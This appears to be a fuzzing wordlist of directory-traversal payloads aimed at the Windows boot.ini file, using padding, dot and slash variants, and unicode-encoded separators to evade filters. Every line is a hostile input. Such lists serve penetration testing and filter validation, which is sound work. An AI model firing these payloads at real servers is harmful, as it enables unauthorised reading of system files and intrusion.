AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\boot.ini -.../boot.ini -.../.../boot.ini -.../.../.../boot.ini -.../.../.../.../boot.ini -.../.../.../.../.../boot.ini -.../.../.../.../.../.../boot.ini -.../.../.../.../.../.../.../boot.ini -.../.../.../.../.../.../.../.../boot.ini -...\boot.ini -...\...\boot.ini -...\...\...\boot.ini -...\...\...\...\boot.ini -...\...\...\...\...\boot.ini -...\...\...\...\...\...\boot.ini -...\...\...\...\...\...\...\boot.ini -...\...\...\...\...\...\...\...\boot.ini -..../boot.ini -..../..../boot.ini -..../..../..../boot.ini -..../..../..../..../boot.ini -..../..../..../..../..../boot.ini -..../..../..../..../..../..../boot.ini -..../..../..../..../..../..../..../boot.ini -..../..../..../..../..../..../..../..../boot.ini -....\boot.ini -....\....\boot.ini -....\....\....\boot.ini -....\....\....\....\boot.ini -....\....\....\....\....\boot.ini -....\....\....\....\....\....\boot.ini -....\....\....\....\....\....\....\boot.ini -....\....\....\....\....\....\....\....\boot.ini -........................................................................../boot.ini -........................................................................../../boot.ini -........................................................................../../../boot.ini -........................................................................../../../../boot.ini -........................................................................../../../../../boot.ini -........................................................................../../../../../../boot.ini -........................................................................../../../../../../../boot.ini -........................................................................../../../../../../../../boot.ini -..........................................................................\boot.ini -..........................................................................\..\boot.ini -..........................................................................\..\..\boot.ini -..........................................................................\..\..\..\boot.ini -..........................................................................\..\..\..\..\boot.ini -..........................................................................\..\..\..\..\..\boot.ini -..........................................................................\..\..\..\..\..\..\boot.ini -..........................................................................\..\..\..\..\..\..\..\boot.ini -..%u2215boot.ini -..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215boot.ini -%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -..%u2216boot.ini -..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216boot.ini -..%uEFC8boot.ini -..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uF025boot.ini -..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025boot.ini -%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini 